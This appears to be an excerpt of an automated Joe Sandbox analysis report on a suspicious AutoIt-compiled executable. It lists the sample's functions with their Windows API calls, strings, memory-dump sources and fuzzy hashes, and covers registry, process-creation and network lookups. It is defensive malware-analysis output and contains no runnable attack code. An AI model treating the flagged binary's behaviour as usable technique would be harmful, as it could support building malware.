Instruction Fuzzy Hash: 02927A706082119FD724DF19D480B6BB7F0BF88308F54885EE98A8B352D779ED85CB5A

Function 0041E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E279
timeGetTime.WINMM ref: 0041E51A
TranslateMessage.USER32(?), ref: 0041E646
DispatchMessageW.USER32(?), ref: 0041E651
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E664
LockWindowUpdate.USER32(00000000), ref: 0041E697
DestroyWindow.USER32 ref: 0041E6A3
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041E6BD
Sleep.KERNEL32(0000000A), ref: 00485B15
TranslateMessage.USER32(?), ref: 004862AF
DispatchMessageW.USER32(?), ref: 004862BD
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004862D1

Strings

@GUI_CTRLID, xrefs: 00485BB9
@GUI_CTRLHANDLE, xrefs: 00485C51
@TRAY_ID, xrefs: 00485D6E
@GUI_WINHANDLE, xrefs: 00485C05

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: 2807b3397508968a66cef8241ed1d78b6a69c772dd03b8be8b776f4f981e6653
Instruction ID: 9fa3c98330fff13dd2f26b047f399302c3bb01cee5ca3546d5ec9d9f5a205b9f
Opcode Fuzzy Hash: 2807b3397508968a66cef8241ed1d78b6a69c772dd03b8be8b776f4f981e6653
Instruction Fuzzy Hash: C162D0706043409BDB24EF65C895BAA77E4BF54308F04497FFD4A8B292D778D888CB5A

Function 00446A28 Relevance: 49.6, APIs: 26, Strings: 2, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00446C73
___createFile.LIBCMT ref: 00446CB4
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00446CDD
__dosmaperr.LIBCMT ref: 00446CE4
GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00446CF7
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00446D1A
__dosmaperr.LIBCMT ref: 00446D23
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00446D2C
__set_osfhnd.LIBCMT ref: 00446D5C
__lseeki64_nolock.LIBCMT ref: 00446DC6
__close_nolock.LIBCMT ref: 00446DEC
__chsize_nolock.LIBCMT ref: 00446E1C
__lseeki64_nolock.LIBCMT ref: 00446E2E
__lseeki64_nolock.LIBCMT ref: 00446F26
__lseeki64_nolock.LIBCMT ref: 00446F3B
__close_nolock.LIBCMT ref: 00446F9B

Part of subcall function 0043F84C: CloseHandle.KERNEL32(00000000,004BEEC4,00000000,?,00446DF1,004BEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0043F89C
Part of subcall function 0043F84C: GetLastError.KERNEL32(?,00446DF1,004BEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0043F8A6
Part of subcall function 0043F84C: __free_osfhnd.LIBCMT ref: 0043F8B3
Part of subcall function 0043F84C: __dosmaperr.LIBCMT ref: 0043F8D5

Part of subcall function 0043889E: __getptd_noexit.LIBCMT ref: 0043889E

__lseeki64_nolock.LIBCMT ref: 00446FBD
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004470F2
___createFile.LIBCMT ref: 00447111
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0044711E
__dosmaperr.LIBCMT ref: 00447125
__free_osfhnd.LIBCMT ref: 00447145
__invoke_watson.LIBCMT ref: 00447173
__wsopen_helper.LIBCMT ref: 0044718D

Strings

@, xrefs: 00446D48
9AC, xrefs: 0044705E

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: 9AC$@
API String ID: 3896587723-3159589149
Opcode ID: ef151869139d614b2affdd06af08b198e039cfefc6c7537a664696f429065ff9
Instruction ID: 52bc54dbf24e9ec58cd61e2c7ca28c5143fec2a7654160797081b9bca49b5465
Opcode Fuzzy Hash: ef151869139d614b2affdd06af08b198e039cfefc6c7537a664696f429065ff9
Instruction Fuzzy Hash: 70222471E042059BFB289F68DC91BAE7B61EF06324F25422BE511AB3D1C73D8D41C75A

Function 004576DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 004576ED
GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00457713
_wcscpy.LIBCMT ref: 00457741
_wcscmp.LIBCMT ref: 0045774C
_wcscat.LIBCMT ref: 00457762
_wcsstr.LIBCMT ref: 0045776D
754B1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00457789
_wcscat.LIBCMT ref: 004577D2
_wcscat.LIBCMT ref: 004577D9
_wcsncpy.LIBCMT ref: 00457804

Strings

DefaultLangCodepage, xrefs: 004577EC
\VarFileInfo\Translation, xrefs: 00457781
StringFileInfo\, xrefs: 0045775C
04090000, xrefs: 004577BF
%u.%u.%u.%u, xrefs: 00457867

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$B1560Size_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 398981869-1459072770
Opcode ID: 6f60434af601f65658297366dcb4f3d1ca181097ebb288e3d986329031004ff9
Instruction ID: c8afe5b51752c77f1f5f2d06d53c2a9fecfe9cb7c02c3f54b35a7e019847a287
Opcode Fuzzy Hash: 6f60434af601f65658297366dcb4f3d1ca181097ebb288e3d986329031004ff9
Instruction Fuzzy Hash: F641D3B1904200BAEB01B7659D47FBF77ACDF19725F10407FF901A2193EB6DAA01C6A9

Function 00411F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00417E53: _memmove.LIBCMT ref: 00417EB9

GetForegroundWindow.USER32 ref: 00411FBE
IsWindow.USER32(?), ref: 0048282E

Strings

LAST, xrefs: 004825E7
HANDLE, xrefs: 00482613
REGEXPCLASS, xrefs: 0048267A
REGEXPTITLE, xrefs: 00482629
ACTIVE, xrefs: 004825FD
CLASS, xrefs: 00482659
TITLE, xrefs: 004827C3
INSTANCE, xrefs: 0048276D
ALL, xrefs: 00482795

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 9f30ca96d89ab191063c7f290343b4eb268ecf155b5de673b07821d10e6285c2
Instruction ID: a085d029ef4fd7801b0b5c0784b2d2a2390bbe14c0e792cc2738270ccd1a7fba
Opcode Fuzzy Hash: 9f30ca96d89ab191063c7f290343b4eb268ecf155b5de673b07821d10e6285c2
Instruction Fuzzy Hash: D5D11B30504602DBCB04FF11C680AAEB7B1BF54348F544E2FF455572A1DBB8E99ACB9A

Function 0047352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00473626
RegCreateKeyExW.KERNEL32(?,?,00000000,004ADBF0,00000000,?,00000000,?,?), ref: 00473694
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004736DC
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00473765
RegCloseKey.ADVAPI32(?), ref: 00473A85
RegCloseKey.ADVAPI32(00000000), ref: 00473A92

Strings

REG_BINARY, xrefs: 00473A20
REG_QWORD, xrefs: 004739D3
REG_SZ, xrefs: 004737A3
REG_DWORD, xrefs: 00473956
REG_EXPAND_SZ, xrefs: 00473702
REG_MULTI_SZ, xrefs: 0047384D

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 68fa1a282a03441540d58737db3894b331cf8d20b378e413dca9084d5ee69403
Instruction ID: 9688288183c82002beaa111fce0f74e9c0fa97f72aded5774cc5968616661b77
Opcode Fuzzy Hash: 68fa1a282a03441540d58737db3894b331cf8d20b378e413dca9084d5ee69403
Instruction Fuzzy Hash: B80281756006019FCB14EF15C991E6AB7E4FF88728F04845EF88A9B361DB38ED41CB49

Function 0042E975 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042EA39
__wsplitpath.LIBCMT ref: 0042EA56

Part of subcall function 0043297D: __wsplitpath_helper.LIBCMT ref: 004329BD

_wcsncat.LIBCMT ref: 0042EA69
__makepath.LIBCMT ref: 0042EA85

Part of subcall function 00432BFF: __wmakepath_s.LIBCMT ref: 00432C13

Part of subcall function 0043010A: std::exception::exception.LIBCMT ref: 0043013E
Part of subcall function 0043010A: __CxxThrowException@8.LIBCMT ref: 00430153

_wcscpy.LIBCMT ref: 0042EABE

Part of subcall function 0042EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0042EADA,?,?), ref: 0042EB27

_wcscat.LIBCMT ref: 004832FC
_wcscat.LIBCMT ref: 00483334
_wcsncpy.LIBCMT ref: 00483370

Strings

Include, xrefs: 0042EA63
'/E, xrefs: 0042E9FC
"M, xrefs: 0042EAEB
\, xrefs: 00483321

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
String ID: '/E$Include$\$"M
API String ID: 1213536620-3690371547
Opcode ID: 970c85fa51abcb1672ed4a25e3cc0cd5ecf50b21c8b2594b68016635c5ebcf04
Instruction ID: 2051e61b99d04ab3e0937fdda068d9f0cf018acd95819fda8249bec0c83da09a
Opcode Fuzzy Hash: 970c85fa51abcb1672ed4a25e3cc0cd5ecf50b21c8b2594b68016635c5ebcf04
Instruction Fuzzy Hash: F2517FB14053009BC305EF69EE81C9BB7E8FB6D304B80492FF94583261DBB89644CB6E

Function 00414257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_KOGJZW.exe,00000104,?,00000000,00000001,00000000), ref: 0041428C

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

Part of subcall function 00431BC7: __wcsicmp_l.LIBCMT ref: 00431C50

_wcscpy.LIBCMT ref: 004143C0
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_KOGJZW.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0048214E

Strings

C:\Users\user\Desktop\._cache_KOGJZW.exe, xrefs: 00414283, 00414288, 00414292, 004143BB, 004143D9, 0048213B, 00482192
CMDLINERAW, xrefs: 004142AD
/ErrorStdOut, xrefs: 0041434B
/AutoIt3ExecuteScript, xrefs: 0041438A
/AutoIt3OutputDebug, xrefs: 00414360
/AutoIt3ExecuteLine, xrefs: 00414375
CMDLINE, xrefs: 004142DA, 004142DF, 0041430D

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\._cache_KOGJZW.exe$CMDLINE$CMDLINERAW
API String ID: 861526374-1362152544
Opcode ID: d22883ea62d891c9f9b926994522e958df4a429f5a3174f83b59c1d04908bea1
Instruction ID: 7bd43209036c513a17053643815323e58f6144793531837e28b9610569b5f584
Opcode Fuzzy Hash: d22883ea62d891c9f9b926994522e958df4a429f5a3174f83b59c1d04908bea1
Instruction Fuzzy Hash: B181C572900119AACB01EBE1DD52EEFB778AF55354F60001BF901B7191EF786B84C7A9

Function 004578EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00457909
gethostname.WS2_32(?,00000100), ref: 00457923
gethostbyname.WS2_32(?), ref: 00457930
_wcscpy.LIBCMT ref: 00457958
_memmove.LIBCMT ref: 0045796B
inet_ntoa.WS2_32(?), ref: 00457976
_strcat.LIBCMT ref: 00457984
_wcscpy.LIBCMT ref: 0045799B
WSACleanup.WS2_32 ref: 004579A9
_wcscpy.LIBCMT ref: 004579B7

Strings

0.0.0.0, xrefs: 00457952

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 857bd46accfcaec13c4d2f0116ad20ddeabe3fb4383350e3a9b86d6e687a2980
Instruction ID: 472fc0cbacee79e9682690db525a6836130e7ecb09074f53cb18ef79b1cad189
Opcode Fuzzy Hash: 857bd46accfcaec13c4d2f0116ad20ddeabe3fb4383350e3a9b86d6e687a2980
Instruction Fuzzy Hash: 85112BB1908115ABDB24A771AC49FDE737CDF04725F1000BBF40592191EF78DA85867C

Function 004130A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 004130B0
LoadCursorW.USER32(00000000,00007F00), ref: 004130BF
LoadIconW.USER32(00000063), ref: 004130D5
LoadIconW.USER32(000000A4), ref: 004130E7
LoadIconW.USER32(000000A2), ref: 004130F9

Part of subcall function 0041318A: LoadImageW.USER32(00410000,00000063,00000001,00000010,00000010,00000000), ref: 004131AE

RegisterClassExW.USER32(?), ref: 00413167

Part of subcall function 00412F58: GetSysColorBrush.USER32(0000000F), ref: 00412F8B
Part of subcall function 00412F58: RegisterClassExW.USER32(00000030), ref: 00412FB5
Part of subcall function 00412F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00412FC6
Part of subcall function 00412F58: LoadIconW.USER32(000000A9), ref: 00413009

Strings

#, xrefs: 00413140
AutoIt v3, xrefs: 00413156
0, xrefs: 00413139

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
String ID: #$0$AutoIt v3
API String ID: 2880975755-4155596026
Opcode ID: ba001dcc9a5a48e7392892960238da85c51cd8597a4c8d6ad7fcb19dbb490fc1
Instruction ID: 721eec10c7ebe1298fa2d38425743fd50e71371e2567d0e8e4bd2b36d4ace0f4
Opcode Fuzzy Hash: ba001dcc9a5a48e7392892960238da85c51cd8597a4c8d6ad7fcb19dbb490fc1
Instruction Fuzzy Hash: 6B213EB0E01304BBDB01EFA9ED49A9DBBF5EB48310F10413BEA14A22B1D7B545808F99

Function 0046B74B Relevance: 15.3, APIs: 10, Instructions: 324
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 0046B777
CoInitialize.OLE32(00000000), ref: 0046B7A4
CoUninitialize.COMBASE ref: 0046B7AE
GetRunningObjectTable.OLE32(00000000,?), ref: 0046B8AE
SetErrorMode.KERNEL32(00000001,00000029), ref: 0046B9DB
CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0046BA0F
CoGetObject.OLE32(?,00000000,0049D91C,?), ref: 0046BA32
SetErrorMode.KERNEL32(00000000), ref: 0046BA45
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0046BAC5
VariantClear.OLEAUT32(0049D91C), ref: 0046BAD5

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 7da6ec9ac083f73d6c5696a55d7d805aa64a47e96e06a677647f02a44f38ccf7
Instruction ID: 39f2d2a32cde6e7d82d0ae6e8d32ad0b13abba48e0bb46dcbf46eaf21f3b116e
Opcode Fuzzy Hash: 7da6ec9ac083f73d6c5696a55d7d805aa64a47e96e06a677647f02a44f38ccf7
Instruction Fuzzy Hash: 7BC1F1B16043059FC700EF65C88496BB7E9FF89308F00492EF58ADB251EB75E945CB96

Function 00412F58 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00412F8B
RegisterClassExW.USER32(00000030), ref: 00412FB5
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00412FC6
LoadIconW.USER32(000000A9), ref: 00413009

Strings

+, xrefs: 00412F74
0, xrefs: 00412F6D
TaskbarCreated, xrefs: 00412FBB
AutoIt v3 GUI, xrefs: 00412FA7

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: 4176662eeceeb99edee2ec8b17b566989824d48ef3c60f6de8f1b53fde2d3a43
Instruction ID: 8af370294eaa726c36a68ffbc0bc37a44158e5a5272609cb9864f5d540544c70
Opcode Fuzzy Hash: 4176662eeceeb99edee2ec8b17b566989824d48ef3c60f6de8f1b53fde2d3a43
Instruction Fuzzy Hash: D421D0B5D01218AFDB00EFA4E949B8DBBF4FB08704F00452BFA11A62A0D7B40544DF99

Function 004723C5 Relevance: 13.9, APIs: 9, Instructions: 376
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 004723E6
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00472579
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047259D
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004725DD
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004725FF
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00472760
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00472792
CloseHandle.KERNEL32(?), ref: 004727C1
CloseHandle.KERNEL32(?), ref: 00472838

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
